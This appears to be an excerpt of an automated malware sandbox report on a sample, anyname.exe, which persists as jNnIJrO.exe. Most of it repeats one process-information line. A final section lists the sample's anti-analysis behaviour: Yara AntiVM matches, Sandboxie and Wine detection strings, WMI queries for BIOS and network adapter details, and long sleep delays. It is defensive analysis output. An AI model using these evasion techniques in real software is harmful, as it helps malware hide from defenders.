                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.2c92d10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.2472cf4.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.247ad00.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.2c9ad1c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.2842d10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.284ad1c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: anyname.exe PID: 6000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 5952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 5280, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: anyname.exe, 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: anyname.exe, 00000001.00000002.338630738.0000000002441000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.420006231.0000000002C61000.00000004.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.435288395.0000000002811000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 400Thread sleep time: -38135s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 5480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 6448Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 6584Thread sleep count: 3203 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exe TID: 6584Thread sleep count: 6652 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 6300Thread sleep time: -40853s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe TID: 1980Thread sleep time: -922337203685477s >= -30000sJump to behavior
